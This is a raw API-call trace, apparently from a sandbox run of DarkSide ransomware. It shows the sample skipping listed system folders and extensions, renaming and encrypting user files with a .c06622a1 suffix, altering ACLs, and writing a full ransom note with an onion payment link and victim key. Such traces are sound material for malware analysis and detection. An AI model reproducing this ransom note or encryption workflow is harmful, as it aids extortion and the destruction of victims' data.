_wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.478] wcslen (_String="pdb") returned 0x3 [0167.478] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.478] wcslen (_String="sqlite") returned 0x6 [0167.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.478] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.478] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.478] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned 0x48 [0167.478] wcscpy (in: _Dest=0x3282112, _Source="Lxd4xieb.jpg" | out: _Dest="Lxd4xieb.jpg") returned="Lxd4xieb.jpg" [0167.478] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg", dwFileAttributes=0x80) returned 1 [0167.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\lxd4xieb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0167.479] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.479] ReadFile (in: hFile=0x1dc, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0167.479] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x417f5024 [0167.480] RtlComputeCrc32 (PartialCrc=0x5024, Buffer=0x32e724, Length=0x80) returned 0x71cebee5 [0167.480] RtlComputeCrc32 (PartialCrc=0xbee5, Buffer=0x32e724, Length=0x80) returned 0xe8c868f [0167.480] RtlComputeCrc32 (PartialCrc=0x868f, Buffer=0x32e724, Length=0x80) returned 0x68c2e43b [0167.480] RtlComputeCrc32 (PartialCrc=0xe43b, Buffer=0x32e724, Length=0x80) returned 0x16ad408f [0167.480] CloseHandle (hObject=0x1dc) returned 1 [0167.480] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.480] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg" [0167.480] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg") returned 0x55 [0167.480] wcscpy (in: _Dest=0x34800f2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.480] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\lxd4xieb.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\lxd4xieb.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\Lxd4xieb.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\lxd4xieb.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1dc [0167.485] CreateIoCompletionPort (FileHandle=0x1dc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.485] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3142ce1 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15312a92 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2367d217 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2bf1e6c7 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x690334c8 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7893a4a1 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d857598 [0167.495] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x440a9c22 [0167.499] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x7c1d7c23 [0167.499] RtlComputeCrc32 (PartialCrc=0x7c23, Buffer=0x2b70094, Length=0x80) returned 0x2168309 [0167.499] RtlComputeCrc32 (PartialCrc=0x8309, Buffer=0x2b70094, Length=0x80) returned 0x9c6798b0 [0167.499] RtlComputeCrc32 (PartialCrc=0x98b0, Buffer=0x2b70094, Length=0x80) returned 0x4dd6dcdb [0167.499] RtlComputeCrc32 (PartialCrc=0xdcdb, Buffer=0x2b70094, Length=0x80) returned 0x85efc4e0 [0167.500] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.500] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.500] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.500] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91500d40, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x91500d40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91500d40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.500] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.500] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a46b50, ftCreationTime.dwHighDateTime=0x1d5dc59, ftLastAccessTime.dwLowDateTime=0xd9a01960, ftLastAccessTime.dwHighDateTime=0x1d5dce4, ftLastWriteTime.dwLowDateTime=0xd9a01960, ftLastWriteTime.dwHighDateTime=0x1d5dce4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ry57L", cAlternateFileName="")) returned 1 [0167.500] _wcsicmp (_Str1="$recycle.bin", _Str2="ry57L") returned -78 [0167.500] wcslen (_String="$recycle.bin") returned 0xc [0167.500] _wcsicmp (_Str1="config.msi", _Str2="ry57L") returned -15 [0167.500] wcslen (_String="config.msi") returned 0xa [0167.500] _wcsicmp (_Str1="$windows.~bt", _Str2="ry57L") returned -78 [0167.500] wcslen (_String="$windows.~bt") returned 0xc [0167.500] _wcsicmp (_Str1="$windows.~ws", _Str2="ry57L") returned -78 [0167.500] wcslen (_String="$windows.~ws") returned 0xc [0167.500] _wcsicmp (_Str1="windows", _Str2="ry57L") returned 5 [0167.500] wcslen (_String="windows") returned 0x7 [0167.500] _wcsicmp (_Str1="appdata", _Str2="ry57L") returned -17 [0167.500] wcslen (_String="appdata") returned 0x7 [0167.500] _wcsicmp (_Str1="application data", _Str2="ry57L") returned -17 [0167.500] wcslen (_String="application data") returned 0x10 [0167.500] _wcsicmp (_Str1="boot", _Str2="ry57L") returned -16 [0167.500] wcslen (_String="boot") returned 0x4 [0167.500] _wcsicmp (_Str1="google", _Str2="ry57L") returned -11 [0167.500] wcslen (_String="google") returned 0x6 [0167.501] _wcsicmp (_Str1="mozilla", _Str2="ry57L") returned -5 [0167.501] wcslen (_String="mozilla") returned 0x7 [0167.501] _wcsicmp (_Str1="program files", _Str2="ry57L") returned -2 [0167.501] wcslen (_String="program files") returned 0xd [0167.501] _wcsicmp (_Str1="program files (x86)", _Str2="ry57L") returned -2 [0167.501] wcslen (_String="program files (x86)") returned 0x13 [0167.501] _wcsicmp (_Str1="programdata", _Str2="ry57L") returned -2 [0167.501] wcslen (_String="programdata") returned 0xb [0167.501] _wcsicmp (_Str1="system volume information", _Str2="ry57L") returned 1 [0167.501] wcslen (_String="system volume information") returned 0x19 [0167.501] _wcsicmp (_Str1="tor browser", _Str2="ry57L") returned 2 [0167.501] wcslen (_String="tor browser") returned 0xb [0167.501] _wcsicmp (_Str1="windows.old", _Str2="ry57L") returned 5 [0167.501] wcslen (_String="windows.old") returned 0xb [0167.501] _wcsicmp (_Str1="intel", _Str2="ry57L") returned -9 [0167.501] wcslen (_String="intel") returned 0x5 [0167.501] _wcsicmp (_Str1="msocache", _Str2="ry57L") returned -5 [0167.501] wcslen (_String="msocache") returned 0x8 [0167.501] _wcsicmp (_Str1="perflogs", _Str2="ry57L") returned -2 [0167.501] wcslen (_String="perflogs") returned 0x8 [0167.501] _wcsicmp (_Str1="x64dbg", _Str2="ry57L") returned 6 [0167.501] wcslen (_String="x64dbg") returned 0x6 [0167.501] _wcsicmp (_Str1="public", _Str2="ry57L") returned -2 [0167.501] wcslen (_String="public") returned 0x6 [0167.501] _wcsicmp (_Str1="all users", _Str2="ry57L") returned -17 [0167.501] wcslen (_String="all users") returned 0x9 [0167.501] _wcsicmp (_Str1="default", _Str2="ry57L") returned -14 [0167.501] wcslen (_String="default") returned 0x7 [0167.502] wcscpy (in: _Dest=0x3262070, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*" [0167.502] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*") returned 0x4a [0167.502] wcscpy (in: _Dest=0x3262102, _Source="ry57L" | out: _Dest="ry57L") returned="ry57L" [0167.502] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.502] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.504] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" [0167.504] GetNamedSecurityInfoW () returned 0x0 [0167.504] SetEntriesInAclW () returned 0x0 [0167.504] SetNamedSecurityInfoW () returned 0x0 [0167.509] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c248) returned 1 [0167.509] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e3ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.509] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 1 [0167.510] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.510] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.510] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e3bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e3bc*=0x7ca, lpOverlapped=0x0) returned 1 [0167.511] CloseHandle (hObject=0x1bc) returned 1 [0167.511] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 0x10 [0167.512] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\") returned="" [0167.512] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\") returned 0x4f [0167.512] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\*", fInfoLevelId=0x0, lpFindFileData=0x32e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e61c) returned 0x154208 [0167.512] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a46b50, ftCreationTime.dwHighDateTime=0x1d5dc59, ftLastAccessTime.dwLowDateTime=0x918b8fa0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x918b8fa0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.513] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee5a630, ftCreationTime.dwHighDateTime=0x1d5e5aa, ftLastAccessTime.dwLowDateTime=0xcaaa6900, ftLastAccessTime.dwHighDateTime=0x1d5e195, ftLastWriteTime.dwLowDateTime=0xcaaa6900, ftLastWriteTime.dwHighDateTime=0x1d5e195, nFileSizeHigh=0x0, nFileSizeLow=0xc01b, dwReserved0=0x0, dwReserved1=0x0, cFileName="1TRsqcrEatY3P2 xj.jpg", cAlternateFileName="1TRSQC~1.JPG")) returned 1 [0167.513] _wcsicmp (_Str1="1TRsqcrEatY3P2 xj.jpg", _Str2="README.c06622a1.TXT") returned -65 [0167.513] wcsstr (_Str="1TRsqcrEatY3P2 xj.jpg", _SubStr="README") returned 0x0 [0167.513] _wcsicmp (_Str1="autorun.inf", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 48 [0167.513] wcslen (_String="autorun.inf") returned 0xb [0167.513] _wcsicmp (_Str1="boot.ini", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 49 [0167.513] wcslen (_String="boot.ini") returned 0x8 [0167.514] _wcsicmp (_Str1="bootfont.bin", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 49 [0167.514] wcslen (_String="bootfont.bin") returned 0xc [0167.514] _wcsicmp (_Str1="bootsect.bak", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 49 [0167.514] wcslen (_String="bootsect.bak") returned 0xc [0167.514] _wcsicmp (_Str1="desktop.ini", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 51 [0167.514] wcslen (_String="desktop.ini") returned 0xb [0167.514] _wcsicmp (_Str1="iconcache.db", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 56 [0167.514] wcslen (_String="iconcache.db") returned 0xc [0167.514] _wcsicmp (_Str1="ntldr", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 61 [0167.514] wcslen (_String="ntldr") returned 0x5 [0167.514] _wcsicmp (_Str1="ntuser.dat", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 61 [0167.514] wcslen (_String="ntuser.dat") returned 0xa [0167.514] _wcsicmp (_Str1="ntuser.dat.log", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 61 [0167.514] wcslen (_String="ntuser.dat.log") returned 0xe [0167.514] _wcsicmp (_Str1="ntuser.ini", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 61 [0167.514] wcslen (_String="ntuser.ini") returned 0xa [0167.514] _wcsicmp (_Str1="thumbs.db", _Str2="1TRsqcrEatY3P2 xj.jpg") returned 67 [0167.514] wcslen (_String="thumbs.db") returned 0x9 [0167.514] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.514] wcslen (_String="386") returned 0x3 [0167.514] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.514] wcslen (_String="adv") returned 0x3 [0167.514] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.514] wcslen (_String="ani") returned 0x3 [0167.514] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.515] wcslen (_String="bat") returned 0x3 [0167.515] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.515] wcslen (_String="bin") returned 0x3 [0167.515] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.515] wcslen (_String="cab") returned 0x3 [0167.515] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.515] wcslen (_String="cmd") returned 0x3 [0167.515] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.515] wcslen (_String="com") returned 0x3 [0167.515] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.515] wcslen (_String="cpl") returned 0x3 [0167.515] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.515] wcslen (_String="cur") returned 0x3 [0167.515] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.515] wcslen (_String="deskthemepack") returned 0xd [0167.515] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.515] wcslen (_String="diagcab") returned 0x7 [0167.515] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.515] wcslen (_String="diagcfg") returned 0x7 [0167.515] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.515] wcslen (_String="diagpkg") returned 0x7 [0167.515] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.515] wcslen (_String="dll") returned 0x3 [0167.515] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.516] wcslen (_String="drv") returned 0x3 [0167.516] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.516] wcslen (_String="exe") returned 0x3 [0167.516] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.516] wcslen (_String="hlp") returned 0x3 [0167.516] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.516] wcslen (_String="icl") returned 0x3 [0167.516] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.516] wcslen (_String="icns") returned 0x4 [0167.516] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.516] wcslen (_String="ico") returned 0x3 [0167.516] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.516] wcslen (_String="ics") returned 0x3 [0167.516] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.516] wcslen (_String="idx") returned 0x3 [0167.516] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.516] wcslen (_String="ldf") returned 0x3 [0167.516] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.516] wcslen (_String="lnk") returned 0x3 [0167.516] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.516] wcslen (_String="mod") returned 0x3 [0167.516] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.516] wcslen (_String="mpa") returned 0x3 [0167.516] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.516] wcslen (_String="msc") returned 0x3 [0167.516] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.517] wcslen (_String="msp") returned 0x3 [0167.517] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.517] wcslen (_String="msstyles") returned 0x8 [0167.517] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.517] wcslen (_String="msu") returned 0x3 [0167.517] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.517] wcslen (_String="nls") returned 0x3 [0167.517] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.517] wcslen (_String="nomedia") returned 0x7 [0167.517] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.517] wcslen (_String="ocx") returned 0x3 [0167.517] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.517] wcslen (_String="prf") returned 0x3 [0167.517] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.517] wcslen (_String="ps1") returned 0x3 [0167.517] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.517] wcslen (_String="rom") returned 0x3 [0167.517] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.517] wcslen (_String="rtp") returned 0x3 [0167.517] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.517] wcslen (_String="scr") returned 0x3 [0167.517] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.517] wcslen (_String="shs") returned 0x3 [0167.517] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.517] wcslen (_String="spl") returned 0x3 [0167.517] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.517] wcslen (_String="sys") returned 0x3 [0167.517] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.518] wcslen (_String="theme") returned 0x5 [0167.518] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.518] wcslen (_String="themepack") returned 0x9 [0167.518] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.518] wcslen (_String="wpx") returned 0x3 [0167.518] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.518] wcslen (_String="lock") returned 0x4 [0167.518] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.518] wcslen (_String="key") returned 0x3 [0167.518] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.518] wcslen (_String="hta") returned 0x3 [0167.518] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.518] wcslen (_String="msi") returned 0x3 [0167.518] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.518] wcslen (_String="pdb") returned 0x3 [0167.518] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.518] wcslen (_String="sqlite") returned 0x6 [0167.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 0x10 [0167.518] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0167.519] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" [0167.519] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH 